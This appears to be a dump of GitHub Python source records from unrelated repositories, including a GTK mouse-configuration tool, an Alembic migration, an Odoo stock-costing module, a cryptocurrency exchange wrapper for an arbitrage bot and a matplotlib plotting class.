self.p_ids[ctr1]\n\t\t\t\t\t\t\tprint(ctr1)\n\t\t\t\t\t\t\tprint(self.name_id)\n\t\t\t\t\t\t\tctr1+=1\n\t\t\t\t\t\tctr+=1\n\t\t\t\t\t\t\n\t\t########################################################\n\t\tfor device in self.p_names:\n\t\t\tmouseCombo.append_text(device)\n\t\t########################################################\n\t\t\t\t\n \n\tdef mouse_selected(self, mouseCombo):\n\t\t# i really don't know why this is working\n\t\tself.chosen = mouseCombo.get_active_text()\n\t\tfor k,v in self.name_id.items()\t:\n\t\t\tif self.chosen == k:\n\t\t\t\t\tself.id = v\n\t\tlist_prop = subprocess.run(['xinput', 'list-props', str(self.id)], stdout=subprocess.PIPE).stdout.decode('utf-8')\n\n\t\twith open('.list_props', 'w') as f:\n\t\t\tf.write(list_prop)\n\t\t\n\t\t# search for property id in .list_props which contains the output of 'xinput list-props device_id'\n\t\tctr4=0\n\t\twith open('.list_props', 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\tif 'Accel Constant Deceleration' in line:\n\t\t\t\t\tctr=0\n\t\t\t\t\tprint(line)\n\t\t\t\t\tfor i in line:\n\t\t\t\t\t\tif '(' in i:\n\t\t\t\t\t\t\tctr1=0\n\t\t\t\t\t\t\tfor a in line:\n\t\t\t\t\t\t\t\tif ctr1 == (ctr+1):\n\t\t\t\t\t\t\t\t\tif a.isdigit():\n\t\t\t\t\t\t\t\t\t\tself.property = int(a)\n\t\t\t\t\t\t\t\t\t\tctr2=0\n\t\t\t\t\t\t\t\t\t\tfor b in line:\n\t\t\t\t\t\t\t\t\t\t\tif ctr2 == (ctr+2):\n\t\t\t\t\t\t\t\t\t\t\t\tif b.isdigit():\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.property = (self.property * 10) + int(b)\n\t\t\t\t\t\t\t\t\t\t\t\t\tctr3=0\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor c in line:\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif ctr3 == (ctr+3):\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif c.isdigit():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.property = (self.property * 10) + int(c)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.prop_id = self.property\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint('Property id: {}'.format(self.prop_id))\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tctr3+=1\n\t\t\t\t\t\t\t\t\t\t\tctr2+=1\n\t\t\t\t\t\t\t\tctr1+=1\n\t\t\t\t\t\tctr+=1\n\t\t\t\t\t\tctr4+=1\n\t\t\tif (ctr4 == 0):\n\t\t\t\ttime.sleep(0.5)\n\t\t\t\tdialog = Gtk.MessageDialog(self, 0, Gtk.MessageType.INFO,\n\t\t\t\t\tGtk.ButtonsType.OK, 'Deceleration mode not available!')\n\t\t\t\tdialog.format_secondary_text('Constant deceleration is not available for this device')\n\t\t\t\tdialog.run()\n\t\t\t\tdialog.destroy()\n \n \n\tdef accel_spin_changed(self, accel_spin):\n\t\tself.accel_value = self.accel_spin.get_value()\n\t\tself.accel_value = int(self.accel_value)\n\t\tprint(self.accel_value)\n\t\tos.system('xset m {}'.format(self.accel_value))\n\t\t\n\t\t\n\tdef decel_spin_changed(self, decel_spin):\n\t\tself.decel_value = self.decel_spin.get_value()\n\t\tif mouseCombo.get_active_text():\n\t\t\tos.system('xinput set-prop {} {} {}'.format(self.id, self.prop_id, self.decel_value))\n\t\telse:\n\t\t\tdialog = Gtk.MessageDialog(self, 0, Gtk.MessageType.ERROR,\n\t\t\t\tGtk.ButtonsType.OK, 'No device selected!')\n\t\t\tdialog.format_secondary_text('Select a device to change deceleration')\n\t\t\tdialog.run()\n\t\t\tdialog.destroy()\n\t\t\n\t\t\n\tdef trim_whitespace(self, index, cmd):\n\t\tto_trim = cmd[index:] \n\t\tlen_trim = len(to_trim)\n\t\tlen_trim = len_trim + 2 # remove 'id'\n\t\t\n\t\tself.p_name = cmd[:-len_trim]\n\t\t\n\t\t# remove whitespace at end of len_trim\n\t\t# discard whitespace between words so whitespace must be more than 1 item\n\t\tctr=0\n\t\tctr1=0\n\t\tfor i in self.p_name:\n\t\t\tif ' ' in i:\n\t\t\t\tfor a in self.p_name:\n\t\t\t\t\t# if iter in first loop is one less than current iter \n\t\t\t\t\tif ctr == (ctr1-1): \t\n\t\t\t\t\t\t# if second item is also whitespace\n\t\t\t\t\t\tif ' ' in a:\n\t\t\t\t\t\t\t# trim self.p_name of all items after first iter\n\t\t\t\t\t\t\tx = len(self.p_name) - ctr\n\t\t\t\t\t\t\tself.p_name = self.p_name[:-x]\n\t\t\t\t\tctr1+=1 \n\t\t\t\t\t\n\t\t\tctr+=1\n\t\tself.p_names.append(self.p_name)\n\t\t\t\t \n\t\t\t\t\n\tdef confirm_id(self, index, cmd):\n\t\tself.cmd = cmd[index:]\n\t\tfor a in self.cmd:\n\t\t\tif (a in '='):\n\t\t\t\tself.cmd = self.cmd[1:]\n\t\t\t\tfor b in self.cmd:\n\t\t\t\t\tif b.isdigit():\n\t\t\t\t\t\tself.p_id = b\n\t\t\t\t\t\tself.p_id = int(self.p_id)\n\t\t\t\t\t\tself.cmd = self.cmd[1:]\n\t\t\t\t\t\tfor c in self.cmd:\n\t\t\t\t\t\t\tif c.isdigit():\n\t\t\t\t\t\t\t\tself.p_id = (self.p_id * 10) + int(c)\n\t\t\t\t\t\t\t\tself.p_ids.append(self.p_id)\n\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.p_ids.append(self.p_id)\n\t\t\t\t\t\t\t\treturn True\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tself.cmd = self.cmd[1:]\t\t\t\n \n\tdef startup_clicked\t(self, startup_Button):\n\t\t\tdialog = Gtk.Dialog()\n\t\t\taccel = ('xset m {}\\n'.format(self.accel_value))\n\t\t\tdecel = ('xinput set-prop {} {} {}'.format(self.id, self.prop_id, self.decel_value))\n\t\t\t\n\t\t\t\n\tdef about_btn_activate(self, about_button):\n\t\tdialog = Gtk.AboutDialog()\n\t\tdialog.set_program_name('Velocity')\n\t\tdialog.set_version('0.1.0')\n\t\tdialog.set_website(\"Youneedtocreateone.com\")\n\t\tdialog.set_authors(\"Luther\")\n\t\tdialog.set_license(license)\n\t\tdialog.set_logo_icon_name('mouse-512.png')\n\t\tdialog.set_default_size(300, 150)\n\t\tdialog.show()\n\t\t\n\t\t\t\n \nwindow = mouse_config()\nwindow.show_all()\nwindow.connect(\"delete-event\", Gtk.main_quit)\nGtk.main()\n","repo_name":"fr3nzy/Mouse-config-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22046030181","text":"\"\"\"Adding key-value table\n\nRevision ID: 456fd4e10658\nRevises: 4475ef3e98af\nCreate Date: 2015-11-05 01:47:04.347535\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '456fd4e10658'\ndown_revision = '4475ef3e98af'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy import Column, String, Text\n \n\n\ndef upgrade():\n op.create_table('storage',\n Column('key', String(255), primary_key=True),\n Column('value', Text),\n )\n\n\ndef downgrade():\n op.drop_table('storage')\n","repo_name":"adsabs/ADSOrcid","sub_path":"alembic/versions/456fd4e10658_adding_key_value_table.py","file_name":"456fd4e10658_adding_key_value_table.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"46440763246","text":"def omar_wid170709_heuristic(game, player):\n\n if game.is_loser(player):\n return float(\"-inf\")\n\n if game.is_winner(player):\n return float(\"inf\")\n\n my_moves = len(game.get_legal_moves(player))\n opponent_moves = len(game.get_legal_moves(game.get_opponent(player)))\n\n weight = 0.0\n\n x, y = game.get_player_location(player)\n\n if (x < game.width-1) and (x > 0) and (y < game.height -1) and (y > 0):\n weight = 0.2\n\n diference_moves = my_moves - opponent_moves\n\n return diference_moves * (1.0 + weight)","repo_name":"omarTronto/WID3009_AIGaming_Group-5_MiniProjectAndAssignments","sub_path":"Individual Assignments/Omar Abdelmomen_WID170709_17107261/Assignment 2/omar_wid170709.py","file_name":"omar_wid170709.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20497991761","text":"def inverse_chaine(chaine):\n resultat = ...\n for caractere in chaine:\n resultat = ...\n return resultat\n\ndef est_palindrome(chaine):\n inverse = inverse_chaine(chaine)\n return ...\n\ndef est_nbr_palindrome(nombre):\n chaine = ...\n return est_palindrome(chaine)\n\n\n# tests\n\nassert inverse_chaine('bac') == 'cab'\n\nassert not est_palindrome('NSI')\n\nassert est_palindrome('ISN-NSI')\n\nassert not est_nbr_palindrome(214312)\n\nassert est_nbr_palindrome(213312)\n","repo_name":"mickaelSASL/epreuve-pratique","sub_path":"2-moyen/est_nb_palindrome/exo.py","file_name":"exo.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6622837168","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\n\nclass ICTSaleDeliveryModel(models.Model):\n _inherit = 'stock.picking'\n\n ict_sales_costing_date = fields.Date('Costing Date')\n sapps_is_real_time = fields.Boolean(string=\"Is Real Time\", compute=\"_compute_is_real_time\")\n\n def _compute_is_real_time(self):\n for res in self:\n res.sapps_is_real_time = bool(self.env['ir.config_parameter'].sudo().get_param('ict_overhead_expenses.sapps_is_real_time'))\n\n def action_done(self):\n res = super(ICTSaleDeliveryModel, self).action_done()\n self._compute_is_real_time()\n if self.sapps_is_real_time and self.sale_id:\n # check period is opened\n last_opened_period = self.env['ict_overhead_expenses.period'].search(\n [('state', '=', 'open')], order='date_start desc', limit=1)\n if last_opened_period and last_opened_period.date_stop < fields.date.today():\n raise UserError(_(\n 'You Cannot proceed with posting inventory, the last opened period is %s' % last_opened_period.name))\n self.ict_sales_costing_date = fields.date.today()\n return res\n\n\nclass ICTLoadingCostStockMove(models.Model):\n _inherit = 'stock.move'\n\n ict_proc_id = fields.Many2one(comodel_name='ict_overhead_expenses.procedure.log', string='Loading Cost Operation', store=True)\n\n def _prepare_account_move_vals(self, credit_account_id, debit_account_id, journal_id, qty, description, svl_id, cost):\n self.ensure_one()\n if self.state == 'done' and self.product_id.bom_ids and \\\n len(self.move_line_ids.filtered(lambda v: v.cost_date)) > 0 and \\\n len(self.product_id.bom_ids.filtered(lambda i: i.finishing_product_ok)) > 0:\n group_by_costing_date = []\n for item in self.move_line_ids.filtered(lambda v: v.cost_date):\n try:\n element = next(i for i in group_by_costing_date if i[\"costing_date\"] == item.cost_date)\n element['count'] = element['count'] + 1\n except StopIteration:\n group_by_costing_date.append({'costing_date': item.cost_date, 'count':1})\n\n total = sum (i['count'] for i in group_by_costing_date)\n # group_by_costing_date[item.cost_date] = group_by_costing_date[item.cost_date] + 1 if group_by_costing_date[item.cost_date] else 1\n for elem in group_by_costing_date:\n AccountMove = self.env['account.move'].with_context(default_journal_id=journal_id)\n\n move_lines = self._prepare_account_move_line(elem['count'], cost*elem['count']/total, credit_account_id, debit_account_id, description)\n if move_lines:\n date = self._context.get('force_period_date', fields.Date.context_today(self))\n new_account_move = AccountMove.sudo().create({\n 'journal_id': journal_id,\n 'line_ids': move_lines,\n 'date': elem['costing_date'],\n 'ref': description,\n 'stock_move_id': self.id,\n 'stock_valuation_layer_ids': [(6, None, [svl_id])],\n 'move_type': 'entry',\n })\n new_account_move.post()\n else:\n return super(ICTLoadingCostStockMove, self)._prepare_account_move_vals(credit_account_id, debit_account_id, journal_id, qty, description, svl_id, cost)\n\n\nclass ICTLoadingCostMrpProduction(models.Model):\n _inherit = 'mrp.production'\n\n unallocated_mo_count = fields.Integer('Unallocated MO Count', compute='_compute_unallocated_move_count', search='_search_unallocated_mo')\n\n def _search_unallocated_mo(self, operator, value):\n recs = self.search([])\n result = []\n if recs:\n for r in recs:\n if r.bom_id.finishing_product_ok and len(r.finished_move_line_ids.filtered(lambda a: a.cost_date is False)) > 0:\n result.append(r.id)\n return [('id', 'in', result)]\n\n @api.depends('name')\n def _compute_unallocated_move_count(self):\n for res in self:\n if res.state == 'done':\n res.unallocated_mo_count = len(res.finished_move_line_ids.filtered(lambda item: False if item.cost_date else True))\n else:\n res.unallocated_mo_count = 0\n\n\nclass ICTOverheadStockMoveLine(models.Model):\n _inherit = \"stock.move.line\"\n\n cost_date = fields.Date('Costing Date')\n ict_included_in_product_cost = fields.Boolean('Overhead Processed', default=False)\n ict_period_id = fields.Many2one(comodel_name='ict_overhead_expenses.sold.items', string='period')\n ict_is_processed_line = fields.Boolean('Is Processed', default=False)\n\n @api.constrains('cost_date')\n def check_cost_date(self):\n if self.cost_date:\n if self.ict_is_processed_line:\n raise UserError(_('You cannot modify a processed line'))\n last_run = self.env['ict_overhead_expenses.procedure.log'].sudo().search([('state', '=', 'done')], order='id desc',\n limit=1)\n if last_run and last_run.end_date >= self.cost_date:\n raise UserError(_('You cannot assign a costing date of closed period'))","repo_name":"OdooAdminstrator1/development","sub_path":"ict_overhead_expenses/models/stock_move.py","file_name":"stock_move.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43722838349","text":"import btceAPI, poloniexAPI, krakenAPI, gdaxAPI\r\nfrom krakenAPI import krak\r\nimport urllib.request\r\nimport json\r\nfrom threading import Thread\r\nfrom time import sleep\r\nfrom datetime import datetime\r\nimport os\r\nimport socket\r\nfrom threading import Thread\r\nimport requests\r\n\r\n\r\nclass Exchange:\r\n \r\n # After selling or buying info about the trade\r\n deal_details = {}\r\n \r\n # Info about the last trade before the current\r\n deal_details_old = {}\r\n \r\n # Info about a canceled order\r\n cancel_details = {}\r\n \r\n # Trade fee\r\n fee = 0\r\n \r\n # API Request string for an exchange\r\n urldata = ''\r\n \r\n # Initial and current amount of ethereum and bitcoin on the exchange\r\n start_eth, eth = 0, 0\r\n start_btc, btc = 0, 0\r\n \r\n # Amount of ethereum, bitcoin on an exchange after the deal adjusted to take into account the order book values\r\n adj_eth = 0\r\n adj_btc = 0\r\n \r\n # Price and amount of crypto when bought/sold\r\n buy_price = 0\r\n sell_price = 0\r\n buy_amount = 0\r\n sell_amount = 0\r\n \r\n # Required minimum profit to make the deal profitable\r\n min_profit = 0\r\n\r\n # Assigning some number to order_ID\r\n order_id = 777777\r\n\r\n\r\n def __init__(self, ex_name):\r\n self.__name = ex_name\r\n self.name = ex_name\r\n\r\n def sell(self):\r\n pass\r\n\r\n def buy(self):\r\n pass\r\n\r\n # Refreshing buy/sell price for various exchanges by loading order book information\r\n\r\n def refresh_price_polo(self):\r\n urldata = 'https://poloniex.com/public?command=returnOrderBook¤cyPair=BTC_ETH&depth=30'\r\n s = requests.Session()\r\n try:\r\n r = s.get(urldata, timeout=5)\r\n text = r.text\r\n the_json = json.loads(text)\r\n self.buy_price = float(the_json['asks'][0][0])\r\n self.buy_amount = float(the_json['asks'][0][1])\r\n self.sell_price = float(the_json['bids'][0][0])\r\n self.sell_amount = float(the_json['bids'][0][1])\r\n finally:\r\n s.close()\r\n\r\n def refresh_price_btce(self):\r\n urldata = 'https://btc-e.com/api/3/depth/eth_btc'\r\n s = requests.Session()\r\n try:\r\n r = s.get(urldata, timeout=5)\r\n text = r.text\r\n the_json = json.loads(text)\r\n self.sell_price = float(the_json['eth_btc']['bids'][0][0])\r\n self.sell_amount = float(the_json['eth_btc']['bids'][0][1])\r\n self.buy_price = float(the_json['eth_btc']['asks'][0][0])\r\n self.buy_amount = float(the_json['eth_btc']['asks'][0][1])\r\n finally:\r\n s.close()\r\n\r\n def refresh_price_kraken(self):\r\n the_json = krakenAPI.krak.query_public('Depth', {'pair': 'XETHXXBT', 'count': 5})\r\n self.buy_price = float(the_json['result']['XETHXXBT']['asks'][0][0])\r\n self.buy_amount = float(the_json['result']['XETHXXBT']['asks'][0][1])\r\n self.sell_price = float(the_json['result']['XETHXXBT']['bids'][0][0])\r\n self.sell_amount = float(the_json['result']['XETHXXBT']['bids'][0][1])\r\n\r\n def refresh_price_gdax(self):\r\n urldata = 'https://api.gdax.com/products/ETH-BTC/book?level=1'\r\n s = requests.Session()\r\n try:\r\n r = s.get(urldata, timeout=5)\r\n text = r.text\r\n the_json = json.loads(text)\r\n self.sell_price = float(the_json['bids'][0][0])\r\n self.sell_amount = float(the_json['bids'][0][1])\r\n self.buy_price = float(the_json['asks'][0][0])\r\n self.buy_amount = float(the_json['asks'][0][1])\r\n finally:\r\n s.close()\r\n\r\n # Buy/sell methods for various exchanges\r\n\r\n def sell_polo(self, rate, amount):\r\n return poloniexAPI.polo.sell('BTC_ETH', rate, amount)\r\n\r\n def buy_polo(self, rate, amount):\r\n return poloniexAPI.polo.buy('BTC_ETH', rate, amount)\r\n\r\n def sell_btce(self, rate, amount):\r\n p = str(rate)\r\n rate = float(p[0:7])\r\n p = str(amount)\r\n amount = float(p[0:7])\r\n return btceAPI.btce.Trade('eth_btc', 'sell', rate, amount)\r\n\r\n def buy_btce(self, rate, amount):\r\n p = str(rate)\r\n rate = float(p[0:7])\r\n p = str(amount)\r\n amount = float(p[0:7])\r\n return btceAPI.btce.Trade('eth_btc', 'buy', rate, amount)\r\n\r\n def sell_kraken(self, rate, amount):\r\n return krakenAPI.krak.PlaceOrder('XETHXXBT', 'sell', rate, amount)\r\n\r\n def buy_kraken(self, rate, amount):\r\n return krakenAPI.krak.PlaceOrder('XETHXXBT', 'buy', rate, amount)\r\n\r\n def sell_gdax(self, rate, amount):\r\n p = str(rate)\r\n rate = float(p[0:7])\r\n p = str(amount)\r\n amount = float(p[0:8])\r\n return gdaxAPI.gdax.sell(rate, amount)\r\n\r\n def buy_gdax(self, rate, amount):\r\n p = str(rate)\r\n rate = float(p[0:7])\r\n p = str(amount)\r\n amount = float(p[0:8])\r\n return gdaxAPI.gdax.buy(rate, amount)\r\n \r\n # Refreshing balances for various exchanges\r\n\r\n def refresh_balances_btce(self):\r\n balance = btceAPI.btce.getInfo()\r\n self.eth = round(float(balance['return']['funds']['eth']) - 0.00001, 5)\r\n self.btc = round(float(balance['return']['funds']['btc']) - 0.00001, 5)\r\n\r\n def refresh_balances_polo(self):\r\n balance = poloniexAPI.polo.return_balances()\r\n self.eth = round(float(balance['ETH']) - 0.00001, 5)\r\n self.btc = round(float(balance['BTC']) - 0.00001, 5)\r\n\r\n def refresh_balances_kraken(self):\r\n balance = krakenAPI.krak.query_private('Balance')\r\n self.eth = float(balance['result']['XETH']) - 0.00001\r\n self.btc = float(balance['result']['XXBT']) - 0.00001\r\n\r\n dict = krakenAPI.krak.query_private('open_orders')\r\n\r\n adj_btc = 0\r\n adj_eth = 0\r\n dict = dict['result']['open']\r\n for key in dict:\r\n if dict[key]['descr']['type'] == 'buy':\r\n adj_btc = adj_btc + float(dict[key]['vol']) * float(dict[key]['descr']['price'])\r\n if dict[key]['descr']['type'] == 'sell':\r\n adj_eth = adj_eth + float(dict[key]['vol'])\r\n\r\n self.eth = self.eth - adj_eth\r\n self.btc = self.btc - adj_btc\r\n\r\n def refresh_balances_gdax(self):\r\n balance = gdaxAPI.gdax.get_accounts()\r\n for account in balance:\r\n if account['currency'] == 'BTC':\r\n self.btc = round(float(account['available']) - 0.00001, 5)\r\n if account['currency'] == 'ETH':\r\n self.eth = round(float(account['available']) - 0.00001, 5)\r\n \r\n # Method to check if the deal was successful for various exchanges \r\n\r\n def succesful_deal_btce(self, deal_details):\r\n if 'return' in deal_details:\r\n self.order_id = deal_details['return']['order_id']\r\n if 'success' in deal_details:\r\n if deal_details['success'] != 0:\r\n return True\r\n return False\r\n\r\n def succesful_deal_poloniex(self, deal_details):\r\n if 'orderNumber' in deal_details:\r\n self.order_id = deal_details['orderNumber']\r\n if 'error' not in deal_details:\r\n return True\r\n return False\r\n\r\n\r\n def succesful_deal_gdax(self, deal_details):\r\n if 'id' in deal_details:\r\n self.order_id = deal_details['id']\r\n return True\r\n return False\r\n \r\n # Example:\r\n # {'result': {'descr': {'order': 'buy 0.10000000 ETHXBT @ limit 0.010000'}, 'txid': ['OHBEGS-YHFZZ-O5W2JS']}, 'error': []}\r\n\r\n def succesful_deal_kraken(self, deal_details):\r\n if 'result' in deal_details:\r\n if 'txid' in deal_details['result']:\r\n self.order_id = deal_details['result']['txid'][0]\r\n if deal_details['error'] == []:\r\n return True\r\n return False\r\n\r\n def completed_deal_poloniex(self, deal_details):\r\n if 'resultingTrades' in deal_details:\r\n if deal_details['resultingTrades'] == []:\r\n return False\r\n else:\r\n return True\r\n\r\n def completed_deal_btce(self, deal_details):\r\n if 'return' in deal_details:\r\n if 'order_id' in deal_details['return']:\r\n if deal_details['return']['order_id'] == 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n def completed_deal_kraken(self, deal_details):\r\n return True\r\n\r\n def completed_deal_gdax(self, deal_details):\r\n return True\r\n\r\n def open_orders_poloniex(self):\r\n self.hanging_orders = poloniexAPI.polo.returnopen_orders('BTC_ETH')\r\n\r\n def open_orders_btce(self):\r\n self.hanging_orders = btceAPI.btce.active_orders('eth_btc')\r\n\r\n def open_orders_kraken(self):\r\n self.hanging_orders = krakenAPI.krak.get_open_orders()\r\n\r\n def open_orders_gdax(self):\r\n self.hanging_orders = gdaxAPI.gdax.get_orders()\r\n\r\n def cancel_order_poloniex(self, order_id):\r\n self.cancel_details = poloniexAPI.polo.cancel('BTC_ETH', order_id)\r\n\r\n def cancel_order_btce(self, order_id):\r\n self.cancel_detail = btceAPI.btce.cancel_order(order_id)\r\n\r\n def cancel_order_kraken(self, order_id):\r\n self.cancel_detail = krakenAPI.krak.cancel_order(order_id)\r\n\r\n def cancel_order_gdax(self, order_id):\r\n self.cancel_detail = gdaxAPI.gdax.cancel_order(order_id)\r\n\r\n\r\n# Initializing each exchange as an object\r\nPoloniex = Exchange('POLONIEX')\r\nBtce = Exchange('BTC-E')\r\nKraken = Exchange('KRAKEN')\r\nGdax = Exchange('GDAX')\r\n\r\nPoloniex.hanging_orders = []\r\nBtce.hanging_orders = []\r\nKraken.hanging_orders = []\r\nGdax.hanging_orders = []\r\n\r\n# Redefining names for all methods to unify call methods\r\nPoloniex.refresh_balances = Poloniex.refresh_balances_polo\r\nBtce.refresh_balances = Btce.refresh_balances_btce\r\nKraken.refresh_balances = Kraken.refresh_balances_kraken\r\nGdax.refresh_balances = Gdax.refresh_balances_gdax\r\n\r\nPoloniex.refresh_price = Poloniex.refresh_price_polo\r\nBtce.refresh_price = Btce.refresh_price_btce\r\nKraken.refresh_price = Kraken.refresh_price_kraken\r\nGdax.refresh_price = Gdax.refresh_price_gdax\r\n\r\nPoloniex.buy_function = Poloniex.buy_polo\r\nPoloniex.sell_function = Poloniex.sell_polo\r\nBtce.buy_function = Btce.buy_btce\r\nBtce.sell_function = Btce.sell_btce\r\nKraken.buy_function = Kraken.buy_kraken\r\nKraken.sell_function = Kraken.sell_kraken\r\nGdax.buy_function = Gdax.buy_gdax\r\nGdax.sell_function = Gdax.sell_gdax\r\n\r\n\r\nPoloniex.completed_deal = Poloniex.completed_deal_poloniex\r\nBtce.completed_deal = Btce.completed_deal_btce\r\nKraken.completed_deal = Kraken.completed_deal_kraken\r\nGdax.completed_deal = Gdax.completed_deal_gdax\r\n\r\n\r\nPoloniex.succesful_deal = Poloniex.succesful_deal_poloniex\r\nBtce.succesful_deal = Btce.succesful_deal_btce\r\nKraken.succesful_deal = Kraken.succesful_deal_kraken\r\nGdax.succesful_deal = Gdax.succesful_deal_gdax\r\n\r\nPoloniex.open_orders = Poloniex.open_orders_poloniex\r\nBtce.open_orders = Btce.open_orders_btce\r\nKraken.open_orders = Kraken.open_orders_kraken\r\nGdax.open_orders = Gdax.open_orders_gdax\r\n\r\nPoloniex.cancel_order = Poloniex.cancel_order_poloniex\r\nBtce.cancel_order = Btce.cancel_order_btce\r\nKraken.cancel_order = Kraken.cancel_order_kraken\r\nGdax.cancel_order = Gdax.cancel_order_gdax\r\n\r\n# Maker fee on the exchanges\r\nPoloniex.fee = 0.0025\r\nBtce.fee = 0.002\r\nKraken.fee = 0.0026\r\nGdax.fee = 0.003\r\n\r\n# Modifier to account for rounding balances by exchanges\r\nPoloniex.add = 0.000002\r\nBtce.add = 0\r\nKraken.add = 0.000002\r\nGdax.add = 0\r\n\r\nexchange_list = [Poloniex, Btce, Gdax, Kraken]\r\n\r\ndef get_all_hanging_orders():\r\n for exchange in exchange_list:\r\n exchange.open_orders()\r\n\r\ntuple_list = []\r\n\r\ndef make_pairs(exchange_list):\r\n global tuple_list\r\n i = 0\r\n b = 0\r\n # Finding all possible combos of exchanges to arbitrage and saving in a list of tuples\r\n while i < len(exchange_list)-1:\r\n while b < len(exchange_list)-1:\r\n k = [exchange_list[i], exchange_list[b+1]]\r\n t = [exchange_list[b+1], exchange_list[i]]\r\n if k in tuple_list or t in tuple_list:\r\n pass\r\n else:\r\n if exchange_list[i] == exchange_list[b+1]:\r\n pass\r\n else:\r\n tuple_list.append(k)\r\n tuple_list.append(t)\r\n b += 1\r\n b = 0\r\n i += 1\r\n return tuple_list\r\n\r\ntuple_list = make_pairs(exchange_list)\r\n","repo_name":"alexstuk/arbitrage-bot","sub_path":"classExchange.py","file_name":"classExchange.py","file_ext":"py","file_size_in_byte":12479,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"18047186561","text":"__author__ = \"V.A. Sole - ESRF Data Analysis\"\n__contact__ = \"sole@esrf.fr\"\n__license__ = \"MIT\"\n__copyright__ = \"European Synchrotron Radiation Facility, Grenoble, France\"\nimport os\nimport numpy\nimport logging\nfrom matplotlib import cm\nfrom matplotlib import __version__ as matplotlib_version\nfrom matplotlib.font_manager import FontProperties\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom matplotlib.colors import LinearSegmentedColormap, LogNorm, Normalize\nfrom matplotlib.ticker import MaxNLocator, AutoLocator\n\n\n_logger = logging.getLogger(__name__)\n\ncolordict = {}\ncolordict['blue'] = '#0000ff'\ncolordict['red'] = '#ff0000'\ncolordict['green'] = '#00ff00'\ncolordict['black'] = '#000000'\ncolordict['white'] = '#ffffff'\ncolordict['pink'] = '#ff66ff'\ncolordict['brown'] = '#a52a2a'\ncolordict['orange'] = '#ff9900'\ncolordict['violet'] = '#6600ff'\ncolordict['grey'] = '#808080'\ncolordict['yellow'] = '#ffff00'\ncolordict['darkgreen'] = 'g'\ncolordict['darkbrown'] = '#660000'\ncolordict['magenta'] = 'm'\ncolordict['cyan'] = 'c'\ncolordict['bluegreen'] = '#33ffff'\ncolorlist = [colordict['black'],\n colordict['red'],\n colordict['blue'],\n colordict['green'],\n colordict['pink'],\n colordict['brown'],\n colordict['cyan'],\n colordict['orange'],\n colordict['violet'],\n colordict['bluegreen'],\n colordict['grey'],\n colordict['magenta'],\n colordict['darkgreen'],\n colordict['darkbrown'],\n colordict['yellow']]\n\nclass PyMcaMatplotlibSave(FigureCanvas):\n def __init__(self, size = (7,3.5),\n logx = False,\n logy = False,\n legends = True,\n bw = False):\n\n self.fig = Figure(figsize=size) #in inches\n FigureCanvas.__init__(self, self.fig)\n\n self._logX = logx\n self._logY = logy\n self._bw = bw\n self._legend = legends\n self._legendList = []\n self._dataCounter = 0\n\n if not legends:\n if self._logY:\n ax = self.fig.add_axes([.15, .15, .75, .8])\n else:\n ax = self.fig.add_axes([.15, .15, .75, .75])\n else:\n if self._logY:\n ax = self.fig.add_axes([.15, .15, .7, .8])\n else:\n ax = self.fig.add_axes([.15, .15, .7, .8])\n\n ax.set_axisbelow(True)\n\n self.ax = ax\n\n\n if self._logY:\n self._axFunction = ax.semilogy\n else:\n self._axFunction = ax.plot\n\n if self._bw:\n self.colorList = ['k'] #only black\n self.styleList = ['-', ':', '-.', '--']\n self.nColors = 1\n else:\n self.colorList = colorlist\n self.styleList = ['-', '-.', ':']\n self.nColors = len(colorlist)\n self.nStyles = len(self.styleList)\n\n self.colorIndex = 0\n self.styleIndex = 0\n\n self.xmin = None\n self.xmax = None\n self.ymin = None\n self.ymax = None\n self.limitsSet = False\n\n def setLimits(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n self.limitsSet = True\n\n\n def _filterData(self, x, y):\n index = numpy.flatnonzero((self.xmin <= x) & (x <= self.xmax))\n x = numpy.take(x, index)\n y = numpy.take(y, index)\n index = len(index)\n if index:\n index = numpy.flatnonzero((self.ymin <= y) & (y <= self.ymax))\n index = len(index)\n return index\n\n def _getColorAndStyle(self):\n color = self.colorList[self.colorIndex]\n style = self.styleList[self.styleIndex]\n self.colorIndex += 1\n if self.colorIndex >= self.nColors:\n self.colorIndex = 0\n self.styleIndex += 1\n if self.styleIndex >= self.nStyles:\n self.styleIndex = 0\n return color, style\n\n def addDataToPlot(self, x, y, legend = None,\n color = None,\n linewidth = None,\n linestyle = None, **kw):\n n = max(x.shape)\n if self.limitsSet is not None:\n n = self._filterData(x, y)\n if n == 0:\n #nothing to plot\n _logger.debug(\"nothing to plot\")\n return\n style = None\n if color is None:\n color, style = self._getColorAndStyle()\n if linestyle is None:\n if style is None:\n style = '-'\n else:\n 